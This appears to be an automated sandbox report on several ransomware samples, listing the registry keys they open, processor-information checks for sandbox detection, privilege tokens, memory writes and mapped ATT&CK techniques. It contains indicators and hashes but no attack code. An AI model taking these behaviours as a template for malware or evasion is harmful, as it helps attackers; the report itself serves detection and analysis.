Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Crypmod.gen-62995e2a5c4384054be5df6c4559a9ddc407b3d02110039213e702085320c22a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winsvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svcc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1488	cmd.exe
1404	PING.EXE
1516	cmd.exe
864	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0C70D541-9ED3-11EF-9204-FE6EB537C9A6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d907000000000200000000001066000000010000200000009cf626b6a07b0cd12ab16c55fe388fc85570ea332bd018cf7cd10c017a79a58e000000000e800000000200002000000083ca25039aab03f37fb7aab25a8aa5b851fcf8e22dfab3bff59979580611eea720000000d31990b7ea5500557c37a610493c55725273837b90a59d4a4799dccb36c63d4340000000fea87460383e453c0e4db3f79cdcd6a5cb6bbb8e0fa7be72e0d6c6388f03632bf2bc8d9be421c6d09774164f82fd065989e6169d86a34df3de3e945653cec79e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d793ad506ece624c80bd99362738d90700000000020000000000106600000001000020000000a67fffd1d00fcbcaab53e4209ec7f0574dade5ba0ff3f08631990d230f9a23c1000000000e80000000020000200000006d174e9f8afe36e3915fd689adc3de5f5ee8dbaacd9f083ebd1d40792ec3fb6b900000006da008e108ad7fa3a1cf8354c4b4e94e11e76666bc3bfbc978d4b146d4c6a00fc0c6363c0e30c10516bd0cce180984ece52675adc40cfe945b90b9b7260525fb2383c5286207f4ea989a141d9f5b748a2649fec7c0539e51c76e7811302411bca30a97bc20bd55bbc0b6cb3c38e83f3cd17f0ff6c7c67425e618b0ac9120ce3deef973c4aeea7f4ed9723aa78bf671c240000000aa1220c8ea1a8925825627d360bb52f47523022b84a18d2ebc03a66218361458588d6a8f9fd2148db153adf31a51320a91cc61103e69db11f6497bd107c61ba8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 108322e2df32db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
864	PING.EXE
1404	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs

pid	Process
484	HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
2540	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
1664	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1484	HEUR-Trojan-Ransom.Win32.Crypmod.gen-62995e2a5c4384054be5df6c4559a9ddc407b3d02110039213e702085320c22a.exe
536	HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe
1508	HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe
860	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
1732	Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
468	Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe
2896	taskmgr.exe
860	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
860	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
1748	HEUR-Trojan-Ransom.Win32.Blocker.gen-2596926944154f01477fb51f21d48eec37fa8976b139a9ca8293bfc5279fec49.exe
2896	taskmgr.exe
1508	HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2896	taskmgr.exe
1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeRestorePrivilege	1916	7zFM.exe
Token: 35	1916	7zFM.exe
Token: SeSecurityPrivilege	1916	7zFM.exe
Token: SeDebugPrivilege	2896	taskmgr.exe
Token: SeDebugPrivilege	1508	HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe
Token: SeDebugPrivilege	1664	HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-96254017c302dfa9b48ccea19f5a089dcd8807c8ca8b5958c373a04b8a07e1ce.exe
Token: SeDebugPrivilege	2540	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	484	HEUR-Trojan-Ransom.MSIL.Blocker.gen-df46d7a13fb63c2a7575a650b83a090f24ae1b8766be004a4c0da3e2cf92aaf9.exe
Token: SeDebugPrivilege	884	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	552	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	1964	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	2080	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	2828	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	1052	HEUR-Trojan-Ransom.MSIL.Crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: 33	1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeIncBasePriorityPrivilege	1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
Token: SeDebugPrivilege	1756	svcc.exe
Token: SeDebugPrivilege	2392	winint.exe
Token: SeDebugPrivilege	39288	Process not Found

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1916	7zFM.exe
1916	7zFM.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe
2896	taskmgr.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
1800	heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe
2000	svcc.exe
2964	iexplore.exe
2964	iexplore.exe
2744	IEXPLORE.EXE
2744	IEXPLORE.EXE
2540	Process not Found
2552	Process not Found
39288	Process not Found

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
860	Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
1732	Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 484	2704	cmd.exe	36
PID 2704 wrote to memory of 484	2704	cmd.exe	36
PID 2704 wrote to memory of 484	2704	cmd.exe	36
PID 2704 wrote to memory of 484	2704	cmd.exe	36
PID 2704 wrote to memory of 2540	2704	cmd.exe	37
PID 2704 wrote to memory of 2540	2704	cmd.exe	37
PID 2704 wrote to memory of 2540	2704	cmd.exe	37
PID 2704 wrote to memory of 2540	2704	cmd.exe	37
PID 2704 wrote to memory of 1664	2704	cmd.exe	38
PID 2704 wrote to memory of 1664	2704	cmd.exe	38
PID 2704 wrote to memory of 1664	2704	cmd.exe	38
PID 2704 wrote to memory of 1664	2704	cmd.exe	38
PID 2704 wrote to memory of 1748	2704	cmd.exe	39
PID 2704 wrote to memory of 1748	2704	cmd.exe	39
PID 2704 wrote to memory of 1748	2704	cmd.exe	39
PID 2704 wrote to memory of 1748	2704	cmd.exe	39
PID 2704 wrote to memory of 1484	2704	cmd.exe	40
PID 2704 wrote to memory of 1484	2704	cmd.exe	40
PID 2704 wrote to memory of 1484	2704	cmd.exe	40
PID 2704 wrote to memory of 1484	2704	cmd.exe	40
PID 2704 wrote to memory of 536	2704	cmd.exe	41
PID 2704 wrote to memory of 536	2704	cmd.exe	41
PID 2704 wrote to memory of 536	2704	cmd.exe	41
PID 2704 wrote to memory of 536	2704	cmd.exe	41
PID 2704 wrote to memory of 1508	2704	cmd.exe	42
PID 2704 wrote to memory of 1508	2704	cmd.exe	42
PID 2704 wrote to memory of 1508	2704	cmd.exe	42
PID 2704 wrote to memory of 1508	2704	cmd.exe	42
PID 2704 wrote to memory of 468	2704	cmd.exe	43
PID 2704 wrote to memory of 468	2704	cmd.exe	43
PID 2704 wrote to memory of 468	2704	cmd.exe	43
PID 2704 wrote to memory of 2464	2704	cmd.exe	44
PID 2704 wrote to memory of 2464	2704	cmd.exe	44
PID 2704 wrote to memory of 2464	2704	cmd.exe	44
PID 2704 wrote to memory of 2464	2704	cmd.exe	44
PID 2704 wrote to memory of 860	2704	cmd.exe	45
PID 2704 wrote to memory of 860	2704	cmd.exe	45
PID 2704 wrote to memory of 860	2704	cmd.exe	45
PID 2704 wrote to memory of 860	2704	cmd.exe	45
PID 2704 wrote to memory of 1732	2704	cmd.exe	46
PID 2704 wrote to memory of 1732	2704	cmd.exe	46
PID 2704 wrote to memory of 1732	2704	cmd.exe	46
PID 2704 wrote to memory of 1732	2704	cmd.exe	46
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
PID 2464 wrote to memory of 772	2464	Trojan-Ransom.Win32.SageCrypt.dqq-0d4ade5eb23386bac3650eed6d7e8c311d9cfc399b50674e8489a5328ccc58ea.exe	47
